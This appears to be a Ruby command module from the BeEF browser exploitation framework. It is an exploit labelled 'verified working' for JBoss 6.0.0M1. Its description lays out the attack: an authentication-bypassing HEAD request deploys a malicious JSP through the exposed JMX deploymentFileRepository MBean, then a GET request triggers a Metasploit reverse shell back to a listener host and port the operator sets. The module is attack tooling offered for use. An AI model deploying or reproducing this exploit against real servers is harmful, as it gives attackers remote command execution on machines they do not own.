class Jboss_jmx_upload_exploit < BeEF::Core::Command

  #
  # Defines and set up the command module.
  #
  def initialize
    super({
      'Name' => 'Jboss 6.0.0M1 JMX Deploy Exploit',
      'Description' => 'Deploy a JSP reverse shell (Metasploit one) using the JMX exposed deploymentFileRepository MBean of JBoss. The first request made is a HEAD one to bypass auth and deploy the malicious JSP, the second request is a GET one that triggers the reverse connection to the specified MSF listener.<br>Remember to run the MSF multi/hanlder listener with java/jsp_shell_reverse_tcp as payload.',
      'Category' => 'Network',
      'Author' => 'antisnatchor, l33tb0y',
      'Data' => [
        {'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1'},
        {'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080'},
        {'name' => 'lhost', 'ui_label' => 'MSF Listener Host', 'value' => '127.0.0.1'},
        {'name' => 'lport', 'ui_label' => 'MSF Listener Port', 'value' => '6666'},
        {'name' => 'injectedCommand', 'ui_label' => 'Command to execute', 'value' => 'cmd.exe'},
        {'name' => 'jspName', 'ui_label' => 'Malicious JSP name', 'value' =>  rand(32**20).to_s(32)}
      ],
      'File' => __FILE__
    })

    set_target({
      'verified_status' =>  VERIFIED_WORKING,
      'browser_name' =>     ALL
    })

    use_template!
  end

  def callback
    save({'result' => @datastore['result']})
  end

end